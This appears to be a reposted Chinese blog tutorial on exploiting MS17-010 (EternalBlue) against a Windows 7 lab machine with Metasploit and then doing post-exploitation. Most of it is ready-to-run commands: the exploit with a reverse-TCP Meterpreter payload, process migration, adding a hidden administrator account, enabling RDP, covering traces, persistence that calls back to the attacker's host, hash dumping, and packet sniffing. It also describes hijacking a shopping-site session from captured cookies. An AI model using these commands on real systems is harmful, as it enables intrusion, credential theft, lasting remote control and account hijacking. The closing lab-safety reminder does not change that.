从永恒之蓝到持久化控制:基于Kali 2022与Win7的Meterpreter后渗透实战解析
1. 永恒之蓝漏洞利用实战记得第一次接触永恒之蓝漏洞时我对着Kali终端敲下exploit命令的手都在发抖。这个2017年震惊全球的MS17-010漏洞至今仍是内网渗透的经典入口。下面我就用Kali 2022和Win7靶机带你完整走一遍攻击流程。先确认下实验环境攻击机Kali Linux 2022.3IP:61.139.2.139靶机Windows 7 x64IP:61.139.2.140靶机预处理有三步必做关闭防火墙netsh advfirewall set allprofiles state off确认445端口开放netstat -ano | findstr 445开启远程桌面控制面板→系统和安全→允许远程访问在Kali终端输入msfconsole启动Metasploit框架后我习惯先用search ms17_010查看可用模块。这里会看到5个相关模块我们选择最经典的exploit/windows/smb/ms17_010_eternalblue。有个小技巧设置payload时用windows/meterpreter/reverse_tcp比默认的bind_tcp更稳定特别是在NAT环境下。参数设置要注意几个细节set RHOST 61.139.2.140靶机IPset LHOST 61.139.2.139KaliIPset payload windows/meterpreter/reverse_tcp执行exploit后如果看到Meterpreter session 1 opened的提示说明已经拿到shell。但这时连接非常脆弱我建议立即用ps查看进程列表找到services.exe的PID比如444然后执行migrate 444将会话注入系统进程。2. Meterpreter花式提权技巧拿到基础shell只是开始真正的乐趣在后续操作。我常用的提权三板斧是创建管理员账户、开启RDP、部署持久化后门。创建隐藏账户是个技术活shell # 进入cmd模式 net user hacker 233233 /add net localgroup administrators hacker /add这样创建的账户在控制面板里能看到更隐蔽的做法是修改注册表键值把账户添加到$后缀的特殊管理组。开启远程桌面有两个方法直接执行run post/windows/manage/enable_rdp手动修改注册表reg setval -k HKLM\System\CurrentControlSet\Control\Terminal Server -v fDenyTSConnections -d 0用rdesktop 61.139.2.140连接时记得使用刚创建的hacker账户。清理痕迹很重要我常用的命令组合execute -H -f cmd.exe -a /c sc config termservice start disabled execute -H -f cmd.exe -a /c sc stop termservice这组命令会禁用并停止远程桌面服务比单纯关闭端口更彻底。3. 持久化控制的艺术后渗透的精髓在于持久化。我测试过十几种方法最稳定的还是注册表自启动和metsvc服务。注册表持久化这样做run persistence -X -i 3 -l 61.139.2.139 -p 443参数解释-X开机自启动-i 3每3秒尝试连接-l/-p监听服务器IP和端口重启靶机后在Kali上用这个配置监听use exploit/multi/handler set payload windows/meterpreter/reverse_tcp set LHOST 61.139.2.139 set LPORT 443 exploitmetsvc服务更适合长期驻留run metsvc会上传三个文件到靶机metsvc.dllmetsvc-service.exemetsvc.exe在靶机的服务管理器中能看到新增的Meterpreter服务。监听时要改用特殊payloadset payload windows/metsvc_bind_tcp set LPORT 31337不过实测发现win7下这个服务不太稳定建议作为备用方案。4. 密码提取与流量监控拿到密码等于拿到整个系统。在meterpreter里我常用这两个模块run windows/gather/smart_hashdump run windows/gather/credentials/windows_autologin如果抓到NTLM哈希可以用hashcat破解。有次我遇到个弱密码Password123!三秒就破解出来了。流量嗅探更有意思load sniffer sniffer_interfaces sniffer_start 2 # 选择网卡 sniffer_dump 2 /root/capture.pcap在靶机浏览网页后用Wireshark打开pcap文件能清晰看到HTTP明文数据。有个实际案例通过分析淘宝登录流量我们成功还原出cookie实现会话劫持。最后提醒几个注意事项实验环境一定要用隔离网络所有操作前做好快照不要用真实账户密码做测试完成后彻底清理痕迹这些技术就像双刃剑我经常用它们来做企业安全检测。去年帮某公司做渗透测试时就是用这套组合拳发现了他们财务系统的致命漏洞。
本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.coloradmin.cn/o/2429404.html
如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈,一经查实,立即删除!